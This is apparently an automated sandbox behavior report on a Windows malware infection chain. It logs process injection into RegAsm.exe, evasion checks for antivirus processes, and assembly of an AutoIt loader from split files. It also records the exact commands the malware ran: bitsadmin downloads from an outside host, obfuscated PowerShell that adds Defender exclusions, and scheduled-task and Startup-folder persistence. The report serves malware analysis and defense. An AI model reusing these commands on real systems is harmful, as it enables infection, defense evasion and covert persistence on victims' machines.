Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AB7C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ABE0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AC44
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ACA8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AD0C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AD70
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ADD4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AE38
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AE9C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AF00
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AF64
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AFC8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B02C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B090
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B0F4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B158
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B1BC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B220
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B284
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B2E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B34C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B3B0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B414
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B478
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B4DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B540
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B5A4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B608
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B66C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B6D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B734
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B798
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B7FC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B860
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B8C4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B928
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B98C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B9F0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BA54
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BAB8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB1C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB80
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BBE4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BC48
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BCAC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD10
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD74
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BDD8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BE3C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BEA0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF04
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF68
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BFCC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C030
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C094
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C0F8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C15C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C1C0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C224
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C288
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C2EC

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

51_2_01011B4D

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 11_2_00D88700 ShellExecuteA,Sleep,CreateThread,Sleep,

11_2_00D88700

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_0101BBED SendInput,keybd_event,

51_2_0101BBED

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01032D37 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

51_2_01032D37

Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10131261121\EDM8nAR.cmd"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe "C:\Users\user~1\AppData\Local\Temp\10141220101\ReK7Ewx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10141511121\EDM8nAR.cmd"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com" "C:\Users\user\AppData\Local\EduGenius Studios Co\u"
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'"
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'"

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_010114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

51_2_010114AE

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01011FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

51_2_01011FB0

Source: Occupation.com, 00000026.00000000.1591937985.00000000008A3000.00000002.00000001.01000000.00000012.sdmp, Occupation.com, 00000026.00000003.1600904437.000000000429B000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com, 00000033.00000000.1638349918.0000000001073000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EduGeniusX.com	Binary or memory string: Shell_TrayWnd
Source: rapes.exe, rapes.exe, 0000000B.00000002.3355230281.0000000000F83000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: \|Program Manager

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 11_2_00DA9AB5 cpuid

11_2_00DA9AB5

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10131261121\EDM8nAR.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10131261121\EDM8nAR.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141511121\EDM8nAR.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141511121\EDM8nAR.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141550101\HmngBpR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141550101\HmngBpR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141560101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141560101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141640101\ReK7Ewx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141640101\ReK7Ewx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe VolumeInformation	Jump to behavior
